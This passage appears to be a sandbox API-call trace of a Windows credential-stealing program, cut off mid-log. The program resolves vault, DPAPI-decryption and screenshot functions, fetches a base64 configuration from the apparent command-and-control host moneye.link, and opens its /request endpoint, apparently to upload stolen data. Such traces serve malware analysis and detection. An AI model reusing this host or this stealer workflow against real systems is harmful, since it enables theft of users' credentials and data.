lpAddress=0x4c8c90, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.181] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c9db8 [0159.181] VirtualProtect (in: lpAddress=0x4c9db8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.182] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c9b78 [0159.182] VirtualProtect (in: lpAddress=0x4c9b78, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.183] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c9b90 [0159.183] VirtualProtect (in: lpAddress=0x4c9b90, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.183] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c9dd0 [0159.183] VirtualProtect (in: lpAddress=0x4c9dd0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.188] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c8d40 [0159.188] VirtualProtect (in: lpAddress=0x4c8d40, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.188] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c9a58 [0159.188] VirtualProtect (in: lpAddress=0x4c9a58, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.189] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c9c80 [0159.189] VirtualProtect (in: lpAddress=0x4c9c80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.190] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c9bc0 [0159.190] VirtualProtect (in: lpAddress=0x4c9bc0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.190] LocalAlloc (uFlags=0x40, uBytes=0x22) returned 0x4c9ed8 [0159.191] VirtualProtect (in: lpAddress=0x4c9ed8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.191] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c97d8 [0159.191] VirtualProtect (in: lpAddress=0x4c97d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.192] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x4c9a98 [0159.192] VirtualProtect (in: lpAddress=0x4c9a98, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.192] LocalAlloc (uFlags=0x40, uBytes=0x1d) returned 0x4c9f08 [0159.192] VirtualProtect (in: lpAddress=0x4c9f08, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.193] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c9898 [0159.193] VirtualProtect (in: lpAddress=0x4c9898, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.194] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x4c9f30 [0159.194] VirtualProtect (in: lpAddress=0x4c9f30, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.194] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x4c9778 [0159.194] VirtualProtect (in: lpAddress=0x4c9778, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.195] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x4c9f58 [0159.195] VirtualProtect (in: lpAddress=0x4c9f58, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.196] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c9bd8 [0159.196] VirtualProtect (in: lpAddress=0x4c9bd8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.196] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c9bf0 [0159.196] VirtualProtect (in: lpAddress=0x4c9bf0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.197] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4c9d88 [0159.197] VirtualProtect (in: lpAddress=0x4c9d88, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.198] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4c98f8 [0159.201] VirtualProtect (in: lpAddress=0x4c98f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.202] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c9718 [0159.202] VirtualProtect (in: lpAddress=0x4c9718, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.202] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c9738 [0159.202] VirtualProtect (in: lpAddress=0x4c9738, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.203] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c9c08 [0159.203] VirtualProtect (in: lpAddress=0x4c9c08, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.203] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c9da0 [0159.203] VirtualProtect (in: lpAddress=0x4c9da0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.204] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x4c8ca0 [0159.204] VirtualProtect (in: lpAddress=0x4c8ca0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.205] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c9c20 [0159.205] VirtualProtect (in: lpAddress=0x4c9c20, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.205] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c97b8 [0159.205] VirtualProtect (in: lpAddress=0x4c97b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.206] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4c9c38 [0159.206] VirtualProtect (in: lpAddress=0x4c9c38, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.206] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x4c9f80 [0159.206] VirtualProtect (in: lpAddress=0x4c9f80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.207] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c9858 [0159.207] VirtualProtect (in: lpAddress=0x4c9858, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.264] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x4c9fa8 [0159.264] VirtualProtect (in: lpAddress=0x4c9fa8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.265] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c9cc8 [0159.265] VirtualProtect (in: lpAddress=0x4c9cc8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.265] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4c9c98 [0159.265] VirtualProtect (in: lpAddress=0x4c9c98, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.266] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4c9978 [0159.266] VirtualProtect (in: lpAddress=0x4c9978, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.267] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c97f8 [0159.267] VirtualProtect (in: lpAddress=0x4c97f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.267] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c9cb0 [0159.267] VirtualProtect (in: lpAddress=0x4c9cb0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.268] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4c9818 [0159.268] VirtualProtect (in: lpAddress=0x4c9818, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.268] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c9838 [0159.268] VirtualProtect (in: lpAddress=0x4c9838, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.269] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c9ce0 [0159.269] VirtualProtect (in: lpAddress=0x4c9ce0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.269] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x4c8d30 [0159.269] VirtualProtect (in: lpAddress=0x4c8d30, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.270] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c9d10 [0159.270] VirtualProtect (in: lpAddress=0x4c9d10, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.271] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4c8cc0 [0159.271] VirtualProtect (in: lpAddress=0x4c8cc0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.271] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x4c8da0 [0159.271] VirtualProtect (in: lpAddress=0x4c8da0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.272] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x4c8df0 [0159.272] VirtualProtect (in: lpAddress=0x4c8df0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.272] LocalAlloc (uFlags=0x40, uBytes=0x31) returned 0x4c9fd0 [0159.273] VirtualProtect (in: lpAddress=0x4c9fd0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.273] LocalAlloc (uFlags=0x40, uBytes=0x27) returned 0x4ca010 [0159.273] VirtualProtect (in: lpAddress=0x4ca010, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.274] LocalAlloc (uFlags=0x40, uBytes=0x38) returned 0x4ca040 [0159.274] VirtualProtect (in: lpAddress=0x4ca040, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.274] LocalAlloc (uFlags=0x40, uBytes=0x27) returned 0x4ca080 [0159.274] VirtualProtect (in: lpAddress=0x4ca080, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.275] LocalAlloc (uFlags=0x40, uBytes=0x22) returned 0x4ca0b0 [0159.275] VirtualProtect (in: lpAddress=0x4ca0b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.275] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c8d20 [0159.275] VirtualProtect (in: lpAddress=0x4c8d20, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.276] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x4c8e00 [0159.276] VirtualProtect (in: lpAddress=0x4c8e00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.277] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c8e10 [0159.277] VirtualProtect (in: lpAddress=0x4c8e10, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.280] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c8c40 [0159.280] VirtualProtect (in: lpAddress=0x4c8c40, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.283] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x771d0000 [0159.283] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x71590000 [0160.032] LoadLibraryA (lpLibFileName="user32.dll") returned 0x743d0000 [0160.032] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x74ab0000 [0160.032] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x76be0000 [0160.222] LoadLibraryA (lpLibFileName="psapi.dll") returned 0x764d0000 [0160.343] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x71560000 [0160.528] LoadLibraryA (lpLibFileName="vaultcli.dll") returned 0x6fed0000 [0161.426] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x76d00000 [0161.426] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74eb0000 [0161.457] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x6f8d0000 [0162.254] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x74dc0000 [0164.269] LoadLibraryA (lpLibFileName="dbghelp.dll") returned 0x6f790000 [0165.021] GetProcAddress (hModule=0x771d0000, lpProcName="sscanf") returned 0x7724d950 [0165.021] GetProcAddress (hModule=0x771d0000, lpProcName="memset") returned 0x7724cfe0 [0165.021] GetProcAddress (hModule=0x771d0000, lpProcName="memcpy") returned 0x7724c940 [0165.021] GetProcAddress (hModule=0x71590000, lpProcName="InternetOpenA") returned 0x716585d0 [0165.021] GetProcAddress (hModule=0x71590000, lpProcName="InternetConnectA") returned 0x716d0da0 [0165.021] GetProcAddress (hModule=0x71590000, lpProcName="HttpOpenRequestA") returned 0x716f5860 [0165.021] GetProcAddress (hModule=0x71590000, lpProcName="HttpSendRequestA") returned 0x71658e60 [0165.021] GetProcAddress (hModule=0x71590000, lpProcName="HttpQueryInfoA") returned 0x71631880 [0165.022] GetProcAddress (hModule=0x71590000, lpProcName="InternetCloseHandle") returned 0x7165d200 [0165.022] GetProcAddress (hModule=0x71590000, lpProcName="InternetReadFile") returned 0x71617320 [0165.022] GetProcAddress (hModule=0x71590000, lpProcName="InternetSetOptionA") returned 0x71631dc0 [0165.022] GetProcAddress (hModule=0x71590000, lpProcName="InternetOpenUrlA") returned 0x715da6c0 [0165.022] GetProcAddress (hModule=0x71590000, lpProcName="InternetCrackUrlA") returned 0x7166f730 [0165.022] GetProcAddress (hModule=0x743d0000, lpProcName="wsprintfA") returned 0x744004a0 [0165.022] GetProcAddress (hModule=0x743d0000, lpProcName="CharToOemW") returned 0x74452d90 [0165.022] GetProcAddress (hModule=0x743d0000, lpProcName="GetKeyboardLayoutList") returned 0x74408e70 [0165.022] GetProcAddress (hModule=0x743d0000, lpProcName="EnumDisplayDevicesA") returned 0x743e3250 [0165.022] GetProcAddress (hModule=0x743d0000, lpProcName="ReleaseDC") returned 0x743eba40 [0165.022] GetProcAddress (hModule=0x743d0000, lpProcName="GetDC") returned 0x74408990 [0165.023] GetProcAddress (hModule=0x743d0000, lpProcName="GetSystemMetrics") returned 0x743e9160 [0165.023] GetProcAddress (hModule=0x743d0000, lpProcName="GetDesktopWindow") returned 0x743e3470 [0165.023] GetProcAddress (hModule=0x743d0000, lpProcName="GetWindowRect") returned 0x743e4140 [0165.023] GetProcAddress (hModule=0x743d0000, lpProcName="GetWindowDC") returned 0x74408f20 [0165.023] GetProcAddress (hModule=0x743d0000, lpProcName="CloseWindow") returned 0x7442bb50 [0165.023] GetProcAddress (hModule=0x76600000, lpProcName="RegOpenKeyExA") returned 0x7661f790 [0165.023] GetProcAddress (hModule=0x76600000, lpProcName="RegQueryValueExA") returned 0x7661f500 [0165.023] GetProcAddress (hModule=0x76600000, lpProcName="RegCloseKey") returned 0x7661f620 [0165.023] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentHwProfileA") returned 0x76633a60 [0165.023] GetProcAddress (hModule=0x76600000, lpProcName="RegEnumKeyExA") returned 0x76621810 [0165.024] GetProcAddress (hModule=0x76600000, lpProcName="RegGetValueA") returned 0x76621060 [0165.024] GetProcAddress (hModule=0x74ab0000, lpProcName="CreateDCA") returned 0x74b33d70 [0165.024] GetProcAddress (hModule=0x74ab0000, lpProcName="GetDeviceCaps") returned 0x74b30fe0 [0165.024] GetProcAddress (hModule=0x74ab0000, lpProcName="CreateCompatibleDC") returned 0x74b32050 [0165.024] GetProcAddress (hModule=0x74ab0000, lpProcName="CreateCompatibleBitmap") returned 0x74b32390 [0165.024] GetProcAddress (hModule=0x74ab0000, lpProcName="SelectObject") returned 0x74b30440 [0165.024] GetProcAddress (hModule=0x74ab0000, lpProcName="BitBlt") returned 0x74b32230 [0165.024] GetProcAddress (hModule=0x74ab0000, lpProcName="DeleteObject") returned 0x74b30810 [0165.024] GetProcAddress (hModule=0x74ab0000, lpProcName="StretchBlt") returned 0x74b5f810 [0165.024] GetProcAddress (hModule=0x74ab0000, lpProcName="GetObjectW") returned 0x74b322e0 [0165.024] GetProcAddress (hModule=0x74ab0000, lpProcName="GetDIBits") returned 0x74b31580 [0165.024] GetProcAddress (hModule=0x74ab0000, lpProcName="SaveDC") returned 0x74b66070 [0165.025] GetProcAddress (hModule=0x74ab0000, lpProcName="CreateDIBSection") returned 0x74b5ef00 [0165.025] GetProcAddress (hModule=0x74ab0000, lpProcName="DeleteDC") returned 0x74b30d00 [0165.025] GetProcAddress (hModule=0x74ab0000, lpProcName="RestoreDC") returned 0x74b65db0 [0165.025] GetProcAddress (hModule=0x76be0000, lpProcName="DsRoleGetPrimaryDomainInformation") returned 0x6f781730 [0165.161] GetProcAddress (hModule=0x764d0000, lpProcName="GetModuleFileNameExA") returned 0x764d1660 [0165.161] GetProcAddress (hModule=0x73f90000, lpProcName="CryptUnprotectData") returned 0x73fb3140 [0165.161] GetProcAddress (hModule=0x71560000, lpProcName="BCryptCloseAlgorithmProvider") returned 0x71563c50 [0165.161] GetProcAddress (hModule=0x71560000, lpProcName="BCryptDestroyKey") returned 0x71566420 [0165.162] GetProcAddress (hModule=0x71560000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x71563760 [0165.162] GetProcAddress (hModule=0x71560000, lpProcName="BCryptSetProperty") returned 0x715647e0 [0165.162] GetProcAddress (hModule=0x71560000, lpProcName="BCryptGenerateSymmetricKey") returned 0x71564910 [0165.162] GetProcAddress (hModule=0x71560000, lpProcName="BCryptDecrypt") returned 0x71564ff0 [0165.162] GetProcAddress (hModule=0x6fed0000, lpProcName="VaultOpenVault") returned 0x6fedbc10 [0165.162] GetProcAddress (hModule=0x6fed0000, lpProcName="VaultCloseVault") returned 0x6fedbc90 [0165.163] GetProcAddress (hModule=0x6fed0000, lpProcName="VaultEnumerateItems") returned 0x6fedb960 [0165.163] GetProcAddress (hModule=0x6fed0000, lpProcName="VaultGetItemWin8") returned 0x0 [0165.163] GetProcAddress (hModule=0x6fed0000, lpProcName="VaultGetItemWin7") returned 0x0 [0165.163] GetProcAddress (hModule=0x6fed0000, lpProcName="VaultFree") returned 0x6fee7050 [0165.163] GetProcAddress (hModule=0x76d00000, lpProcName="StrCmpCA") returned 0x76d23330 [0165.163] GetProcAddress (hModule=0x76d00000, lpProcName="StrStrA") returned 0x76d23570 [0165.164] GetProcAddress (hModule=0x76d00000, lpProcName="PathMatchSpecA") returned 0x76d22c20 [0165.164] GetProcAddress (hModule=0x74eb0000, lpProcName="SHGetFolderPathA") returned 0x75069b10 [0165.164] GetProcAddress (hModule=0x74eb0000, lpProcName="ShellExecuteExA") returned 0x75120290 [0165.165] GetProcAddress (hModule=0x6f8d0000, lpProcName="GdipGetImageEncodersSize") returned 0x6f92f520 [0165.165] GetProcAddress (hModule=0x6f8d0000, lpProcName="GdipGetImageEncoders") returned 0x6f92f380 [0165.165] GetProcAddress (hModule=0x6f8d0000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x6f915b70 [0165.165] GetProcAddress (hModule=0x6f8d0000, lpProcName="GdiplusStartup") returned 0x6f93ab50 [0165.166] GetProcAddress (hModule=0x6f8d0000, lpProcName="GdiplusShutdown") returned 0x6f93a7c0 [0165.166] GetProcAddress (hModule=0x6f8d0000, lpProcName="GdipSaveImageToStream") returned 0x6f934bd0 [0165.166] GetProcAddress (hModule=0x6f8d0000, lpProcName="GdipDisposeImage") returned 0x6f9391c0 [0165.166] GetProcAddress (hModule=0x6f8d0000, lpProcName="GdipFree") returned 0x6f913810 [0165.166] GetProcAddress (hModule=0x74dc0000, lpProcName="CreateStreamOnHGlobal") returned 0x76361370 [0165.174] GetProcAddress (hModule=0x74dc0000, lpProcName="GetHGlobalFromStream") returned 0x76361a60 [0165.174] GetProcAddress (hModule=0x6f790000, lpProcName="SymMatchString") returned 0x6f872890 [0165.184] GetProcessHeap () returned 0x4c0000 [0165.184] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4098) returned 0x4d76a8 [0165.191] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6400000, lpName=0x0) returned 0x194 [0165.193] MapViewOfFile (hFileMappingObject=0x194, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6400000) returned 0x1fa0000 [0165.196] GetProcessHeap () returned 0x4c0000 [0165.196] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x8) returned 0x4ca810 [0165.196] GetSystemTime (in: lpSystemTime=0x1986e4 | out: lpSystemTime=0x1986e4*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x3, wDay=0x3, wHour=0x11, wMinute=0x20, wSecond=0x1c, wMilliseconds=0x10d)) [0165.196] lstrcatA (in: lpString1="", lpString2="7YMYCBSR1N7YUA" | out: lpString1="7YMYCBSR1N7YUA") returned="7YMYCBSR1N7YUA" [0165.196] lstrcatA (in: lpString1="7YMYCBSR1N7YUA", lpString2=".zip" | out: lpString1="7YMYCBSR1N7YUA.zip") returned="7YMYCBSR1N7YUA.zip" [0165.196] lstrcatA (in: lpString1="", lpString2="http://" | out: lpString1="http://") returned="http://" [0165.196] lstrcatA (in: lpString1="http://", lpString2="moneye.link" | out: lpString1="http://moneye.link") returned="http://moneye.link" [0165.196] lstrcatA (in: lpString1="http://moneye.link", lpString2="/request" | out: lpString1="http://moneye.link/request") returned="http://moneye.link/request" [0165.217] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0167.284] StrCmpCA (pszStr1="http://", pszStr2="https://") returned -57 [0167.284] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x19252c*, dwBufferLength=0x4) returned 1 [0167.285] InternetConnectA (hInternet=0xcc0004, lpszServerName="moneye.link", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0167.285] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/8sd87v7.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4400100, dwContext=0x0) returned 0xcc000c [0167.287] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0172.040] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x192530, lpdwBufferLength=0x192634, lpdwIndex=0x0 | out: lpBuffer=0x192530*, lpdwBufferLength=0x192634*=0x3, lpdwIndex=0x0) returned 1 [0172.040] StrCmpCA (pszStr1="200", pszStr2="200") returned 0 [0172.040] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x191d50, dwNumberOfBytesToRead=0x7cf, lpdwNumberOfBytesRead=0x191d48 | out: lpBuffer=0x191d50*, lpdwNumberOfBytesRead=0x191d48*=0x1c) returned 1 [0172.040] lstrcatA (in: lpString1="", lpString2="MHwwfDF8MXwxfDVxRGxQdVZLb1J8" | out: lpString1="MHwwfDF8MXwxfDVxRGxQdVZLb1J8") returned="MHwwfDF8MXwxfDVxRGxQdVZLb1J8" [0172.040] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x191d50, dwNumberOfBytesToRead=0x7cf, lpdwNumberOfBytesRead=0x191d48 | out: lpBuffer=0x191d50*, lpdwNumberOfBytesRead=0x191d48*=0x0) returned 1 [0172.041] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0172.041] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0172.041] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0172.042] CryptStringToBinaryA (in: pszString="MHwwfDF8MXwxfDVxRGxQdVZLb1J8", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x191d38, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x191d38, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.042] CryptStringToBinaryA (in: pszString="MHwwfDF8MXwxfDVxRGxQdVZLb1J8", cchString=0x1c, dwFlags=0x1, pbBinary=0x18cf14, pcbBinary=0x191d38, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x18cf14, pcbBinary=0x191d38, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.042] lstrcatA (in: lpString1="", lpString2="0|0|1|1|1|5qDlPuVKoR|" | out: lpString1="0|0|1|1|1|5qDlPuVKoR|") returned="0|0|1|1|1|5qDlPuVKoR|" [0172.042] lstrcatA (in: lpString1="", lpString2="0|0|1|1|1|5qDlPuVKoR|" | out: lpString1="0|0|1|1|1|5qDlPuVKoR|") returned="0|0|1|1|1|5qDlPuVKoR|" [0172.042] StrCmpCA (pszStr1="0", pszStr2="1") returned -1 [0172.042] StrCmpCA (pszStr1="0", pszStr2="1") returned -1 [0172.042] StrCmpCA (pszStr1="1", pszStr2="1") returned 0 [0172.042] StrCmpCA (pszStr1="1", pszStr2="1") returned 0 [0172.042] StrCmpCA (pszStr1="1", pszStr2="0") returned 1 [0172.042] lstrcatA (in: lpString1="", lpString2="5qDlPuVKoR" | out: lpString1="5qDlPuVKoR") returned="5qDlPuVKoR" [0172.042] lstrcatA (in: lpString1="5qDlPuVKoR", lpString2=".txt" | out: lpString1="5qDlPuVKoR.txt") returned="5qDlPuVKoR.txt" [0172.042] GetProcessHeap () returned 0x4c0000 [0172.042] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x5f5e0ff) returned 0x8b6d020 [0172.617] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0172.617] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x1987f4*, dwBufferLength=0x4) returned 1 [0172.617] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://moneye.link/request", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x4000100, dwContext=0x0) returned 0xcc000c [0172.874] 